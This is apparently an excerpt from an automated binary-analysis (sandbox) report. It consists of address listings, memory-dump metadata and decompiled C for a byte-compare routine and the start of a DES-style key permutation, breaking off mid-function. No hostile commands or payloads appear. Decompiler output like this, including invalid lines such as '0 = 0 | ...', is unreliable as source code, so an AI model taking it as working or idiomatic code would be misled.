                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c772
                                                                                                                                                      0x1000c6d0
                                                                                                                                                      0x1000c6d2
                                                                                                                                                      0x1000c6e9
                                                                                                                                                      0x1000c6f1
                                                                                                                                                      0x1000c6f3
                                                                                                                                                      0x1000c70a
                                                                                                                                                      0x1000c712
                                                                                                                                                      0x1000c714
                                                                                                                                                      0x1000c72b
                                                                                                                                                      0x1000c733
                                                                                                                                                      0x1000c735
                                                                                                                                                      0x1000c742
                                                                                                                                                      0x1000c742
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c735
                                                                                                                                                      0x1000c721
                                                                                                                                                      0x1000c725
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c725
                                                                                                                                                      0x1000c700
                                                                                                                                                      0x1000c704
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c704
                                                                                                                                                      0x1000c6df
                                                                                                                                                      0x1000c6e3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c6e3
                                                                                                                                                      0x1000c640
                                                                                                                                                      0x1000c642
                                                                                                                                                      0x1000c659
                                                                                                                                                      0x1000c661
                                                                                                                                                      0x1000c663
                                                                                                                                                      0x1000c67a
                                                                                                                                                      0x1000c682
                                                                                                                                                      0x1000c684
                                                                                                                                                      0x1000c69b
                                                                                                                                                      0x1000c6a3
                                                                                                                                                      0x1000c6a5
                                                                                                                                                      0x1000c6b2
                                                                                                                                                      0x1000c6b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c6a5
                                                                                                                                                      0x1000c691
                                                                                                                                                      0x1000c695
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c695
                                                                                                                                                      0x1000c670
                                                                                                                                                      0x1000c674
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c674
                                                                                                                                                      0x1000c64f
                                                                                                                                                      0x1000c653
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c653
                                                                                                                                                      0x1000c5b1
                                                                                                                                                      0x1000c5b3
                                                                                                                                                      0x1000c5ca
                                                                                                                                                      0x1000c5d2
                                                                                                                                                      0x1000c5d4
                                                                                                                                                      0x1000c5eb
                                                                                                                                                      0x1000c5f3
                                                                                                                                                      0x1000c5f5
                                                                                                                                                      0x1000c60c
                                                                                                                                                      0x1000c614
                                                                                                                                                      0x1000c616
                                                                                                                                                      0x1000c623
                                                                                                                                                      0x1000c623
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c616
                                                                                                                                                      0x1000c602
                                                                                                                                                      0x1000c606
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c606
                                                                                                                                                      0x1000c5e1
                                                                                                                                                      0x1000c5e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c5e5
                                                                                                                                                      0x1000c5c0
                                                                                                                                                      0x1000c5c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c5c4
                                                                                                                                                      0x1000c522
                                                                                                                                                      0x1000c524
                                                                                                                                                      0x1000c53b
                                                                                                                                                      0x1000c543
                                                                                                                                                      0x1000c545
                                                                                                                                                      0x1000c55c
                                                                                                                                                      0x1000c564
                                                                                                                                                      0x1000c566
                                                                                                                                                      0x1000c57d
                                                                                                                                                      0x1000c585
                                                                                                                                                      0x1000c587
                                                                                                                                                      0x1000c594
                                                                                                                                                      0x1000c594
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c587
                                                                                                                                                      0x1000c573
                                                                                                                                                      0x1000c577
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c577
                                                                                                                                                      0x1000c552
                                                                                                                                                      0x1000c556
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c556

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                      • Instruction ID: 3027ded48b29fa4aba4523cd27565e48f2218849e2b53ffec30aeb13d9f91fa8
                                                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                      • Instruction Fuzzy Hash: 48D16F73C0EAF3469375C62D445862EEAA2EFC16D132BC3E1DCD43F29D9A269D4096D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000C063(void* __eax, void* __ecx) {
                                                                                                                                                      				void* _t191;
                                                                                                                                                      				signed int _t192;
                                                                                                                                                      				void* _t195;
                                                                                                                                                      				signed char _t201;
                                                                                                                                                      				signed char _t202;
                                                                                                                                                      				signed char _t203;
                                                                                                                                                      				signed char _t204;
                                                                                                                                                      				signed char _t206;
                                                                                                                                                      				signed int _t211;
                                                                                                                                                      				signed int _t309;
                                                                                                                                                      				void* _t312;
                                                                                                                                                      				void* _t314;
                                                                                                                                                      				void* _t316;
                                                                                                                                                      				void* _t318;
                                                                                                                                                      				void* _t321;
                                                                                                                                                      				void* _t323;
                                                                                                                                                      				void* _t325;
                                                                                                                                                      				void* _t328;
                                                                                                                                                      				void* _t330;
                                                                                                                                                      				void* _t332;
                                                                                                                                                      				void* _t335;
                                                                                                                                                      				void* _t337;
                                                                                                                                                      				void* _t339;
                                                                                                                                                      				void* _t342;
                                                                                                                                                      				void* _t344;
                                                                                                                                                      				void* _t346;
                                                                                                                                                      				void* _t349;
                                                                                                                                                      				void* _t351;
                                                                                                                                                      				void* _t353;
                                                                                                                                                      
                                                                                                                                                      				_t195 = __ecx;
                                                                                                                                                      				_t191 = __eax;
                                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                                                                                                                                      					_t309 = 0;
                                                                                                                                                      					L15:
                                                                                                                                                      					if(_t309 != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t201 =  *(_t191 - 0x1a);
                                                                                                                                                      					if(_t201 ==  *(_t195 - 0x1a)) {
                                                                                                                                                      						_t309 = 0;
                                                                                                                                                      						L26:
                                                                                                                                                      						if(_t309 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						_t202 =  *(_t191 - 0x16);
                                                                                                                                                      						if(_t202 ==  *(_t195 - 0x16)) {
                                                                                                                                                      							_t309 = 0;
                                                                                                                                                      							L37:
                                                                                                                                                      							if(_t309 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							_t203 =  *(_t191 - 0x12);
                                                                                                                                                      							if(_t203 ==  *(_t195 - 0x12)) {
                                                                                                                                                      								_t309 = 0;
                                                                                                                                                      								L48:
                                                                                                                                                      								if(_t309 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								_t204 =  *(_t191 - 0xe);
                                                                                                                                                      								if(_t204 ==  *(_t195 - 0xe)) {
                                                                                                                                                      									_t309 = 0;
                                                                                                                                                      									L59:
                                                                                                                                                      									if(_t309 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                                                                                                                                      										_t309 = 0;
                                                                                                                                                      										L70:
                                                                                                                                                      										if(_t309 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										_t206 =  *(_t191 - 6);
                                                                                                                                                      										if(_t206 ==  *(_t195 - 6)) {
                                                                                                                                                      											_t309 = 0;
                                                                                                                                                      											L81:
                                                                                                                                                      											if(_t309 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                                                                                                                                      												_t192 = 0;
                                                                                                                                                      												L3:
                                                                                                                                                      												return _t192;
                                                                                                                                                      											}
                                                                                                                                                      											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                                                                                                                                      											if(_t312 == 0) {
                                                                                                                                                      												L4:
                                                                                                                                                      												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                                                                                                                                      												if(_t192 != 0) {
                                                                                                                                                      													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                                                                                                                                                      												}
                                                                                                                                                      												goto L3;
                                                                                                                                                      											}
                                                                                                                                                      											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                                                                                                                                                      											if(_t211 != 0) {
                                                                                                                                                      												_t192 = _t211;
                                                                                                                                                      												goto L3;
                                                                                                                                                      											}
                                                                                                                                                      											goto L4;
                                                                                                                                                      										}
                                                                                                                                                      										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                                                                                                                                      										if(_t314 == 0) {
                                                                                                                                                      											L74:
                                                                                                                                                      											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                                                                                                                                      											if(_t316 == 0) {
                                                                                                                                                      												L76:
                                                                                                                                                      												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                                                                                                                                      												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
                                                                                                                                                      							L10:
                                                                                                                                                      							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                                                      							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                                      							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                                      							if(__esi == 0) {
                                                                                                                                                      								L12:
                                                                                                                                                      								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                                                      								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                                                      								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                                                      								if(__esi != 0) {
                                                                                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L15;
                                                                                                                                                      							}
                                                                                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      							__esi = __edx;
                                                                                                                                                      							if(__edx != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L12;
                                                                                                                                                      						}
                                                                                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      						__esi = __edx;
                                                                                                                                                      						if(__edx != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L10;
                                                                                                                                                      					}
                                                                                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      					__esi = __edx;
                                                                                                                                                      					if(__edx != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t192 = _t309;
                                                                                                                                                      				goto L3;
                                                                                                                                                      			}
                                                                                                                                                      0x1000c2ff
                                                                                                                                                      0x1000c303
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c303
                                                                                                                                                      0x1000c2de
                                                                                                                                                      0x1000c2e2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c2e2
                                                                                                                                                      0x1000c2bd
                                                                                                                                                      0x1000c2c1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c2c1
                                                                                                                                                      0x1000c21f
                                                                                                                                                      0x1000c221
                                                                                                                                                      0x1000c238
                                                                                                                                                      0x1000c240
                                                                                                                                                      0x1000c242
                                                                                                                                                      0x1000c259
                                                                                                                                                      0x1000c261
                                                                                                                                                      0x1000c263
                                                                                                                                                      0x1000c27a
                                                                                                                                                      0x1000c282
                                                                                                                                                      0x1000c284
                                                                                                                                                      0x1000c291
                                                                                                                                                      0x1000c291
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c284
                                                                                                                                                      0x1000c270
                                                                                                                                                      0x1000c274
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c274
                                                                                                                                                      0x1000c24f
                                                                                                                                                      0x1000c253
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c253
                                                                                                                                                      0x1000c22e
                                                                                                                                                      0x1000c232
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c232
                                                                                                                                                      0x1000c190
                                                                                                                                                      0x1000c192
                                                                                                                                                      0x1000c1a9
                                                                                                                                                      0x1000c1b1
                                                                                                                                                      0x1000c1b3
                                                                                                                                                      0x1000c1ca
                                                                                                                                                      0x1000c1d2
                                                                                                                                                      0x1000c1d4
                                                                                                                                                      0x1000c1eb
                                                                                                                                                      0x1000c1f3
                                                                                                                                                      0x1000c1f5
                                                                                                                                                      0x1000c202
                                                                                                                                                      0x1000c202
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1f5
                                                                                                                                                      0x1000c1e1
                                                                                                                                                      0x1000c1e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1e5
                                                                                                                                                      0x1000c1c0
                                                                                                                                                      0x1000c1c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1c4
                                                                                                                                                      0x1000c19f
                                                                                                                                                      0x1000c1a3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1a3
                                                                                                                                                      0x1000c101
                                                                                                                                                      0x1000c103
                                                                                                                                                      0x1000c11a
                                                                                                                                                      0x1000c122
                                                                                                                                                      0x1000c124
                                                                                                                                                      0x1000c13b
                                                                                                                                                      0x1000c143
                                                                                                                                                      0x1000c145
                                                                                                                                                      0x1000c15c
                                                                                                                                                      0x1000c164
                                                                                                                                                      0x1000c166
                                                                                                                                                      0x1000c173
                                                                                                                                                      0x1000c173
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c166
                                                                                                                                                      0x1000c152
                                                                                                                                                      0x1000c156
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c156
                                                                                                                                                      0x1000c131
                                                                                                                                                      0x1000c135
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c135
                                                                                                                                                      0x1000c110
                                                                                                                                                      0x1000c114
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c06b
                                                                                                                                                      0x1000c06b
                                                                                                                                                      0x1000c06e
                                                                                                                                                      0x1000c072
                                                                                                                                                      0x1000c074
                                                                                                                                                      0x1000c08b
                                                                                                                                                      0x1000c08b
                                                                                                                                                      0x1000c08f
                                                                                                                                                      0x1000c093
                                                                                                                                                      0x1000c095
                                                                                                                                                      0x1000c0ac
                                                                                                                                                      0x1000c0ac
                                                                                                                                                      0x1000c0b0
                                                                                                                                                      0x1000c0b4
                                                                                                                                                      0x1000c0b6
                                                                                                                                                      0x1000c0cd
                                                                                                                                                      0x1000c0cd
                                                                                                                                                      0x1000c0d1
                                                                                                                                                      0x1000c0d5
                                                                                                                                                      0x1000c0d7
                                                                                                                                                      0x1000c0dd
                                                                                                                                                      0x1000c0e0
                                                                                                                                                      0x1000c0e4
                                                                                                                                                      0x1000c0e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c0d7
                                                                                                                                                      0x1000c0bc
                                                                                                                                                      0x1000c0bf
                                                                                                                                                      0x1000c0c3
                                                                                                                                                      0x1000c0c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c0c7
                                                                                                                                                      0x1000c09b
                                                                                                                                                      0x1000c09e
                                                                                                                                                      0x1000c0a2
                                                                                                                                                      0x1000c0a6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c0a6
                                                                                                                                                      0x1000c07a
                                                                                                                                                      0x1000c07d
                                                                                                                                                      0x1000c081
                                                                                                                                                      0x1000c085
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c085
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                      • Instruction ID: 9bf27d4f473e059b9c25e54237eb93213d4a45c65592e091a996cd15196d3fb2
                                                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                      • Instruction Fuzzy Hash: C0D14073C1EAF3469375C62D405862EEAA2EFC16D432BC3E1DCD42F29DDA269D0496D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001EBD0(signed int* _a4, signed char* _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				unsigned int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _t191;
                                                                                                                                                      
                                                                                                                                                      				_t3 =  &(_a8[1]); // 0x86a08c4
                                                                                                                                                      				_t5 =  &(_a8[2]); // 0x8d086a08
                                                                                                                                                      				_t7 =  &(_a8[3]); // 0x858d086a
                                                                                                                                                      				_v20 = ( *_a8 & 0x000000ff) << 0x00000018 | ( *_t3 & 0x000000ff) << 0x00000010 | ( *_t5 & 0x000000ff) << 0x00000008 |  *_t7 & 0x000000ff;
                                                                                                                                                      				_t10 =  &(_a8[4]); // 0xd0858d08
                                                                                                                                                      				_t12 =  &(_a8[5]); // 0xfed0858d
                                                                                                                                                      				_t14 =  &(_a8[6]); // 0xfffed085
                                                                                                                                                      				_t16 =  &(_a8[7]); // 0xfffffed0
                                                                                                                                                      				_v16 = ( *_t10 & 0x000000ff) << 0x00000018 | ( *_t12 & 0x000000ff) << 0x00000010 | ( *_t14 & 0x000000ff) << 0x00000008 |  *_t16 & 0x000000ff;
                                                                                                                                                      				_v8 = (_v16 >> 0x00000004 ^ _v20) & 0x0f0f0f0f;
                                                                                                                                                      				_v20 = _v20 ^ _v8;
                                                                                                                                                      				_v16 = _v8 << 0x00000004 ^ _v16;
                                                                                                                                                      				_v8 = (_v16 ^ _v20) & 0x10101010;
                                                                                                                                                      				_v20 = _v20 ^ _v8;
                                                                                                                                                      				_v16 = _v16 ^ _v8;
                                                                                                                                                      				_v20 =  *(0x10025cf8 + (_v20 & 0x0000000f) * 4) << 0x00000003 |  *(0x10025cf8 + (_v20 >> 0x00000008 & 0x0000000f) * 4) << 0x00000002 |  *(0x10025cf8 + (_v20 >> 0x00000010 & 0x0000000f) * 4) << 0x00000001 |  *(0x10025cf8 + (_v20 >> 0x00000018 & 0x0000000f) * 4) |  *(0x10025cf8 + (_v20 >> 0x00000005 & 0x0000000f) * 4) << 0x00000007 |  *(0x10025cf8 + (_v20 >> 0x0000000d & 0x0000000f) * 4) << 0x00000006 |  *(0x10025cf8 + (_v20 >> 0x00000015 & 0x0000000f) * 4) << 0x00000005 |  *(0x10025cf8 + (_v20 >> 0x0000001d & 0x0000000f) * 4) << 0x00000004;
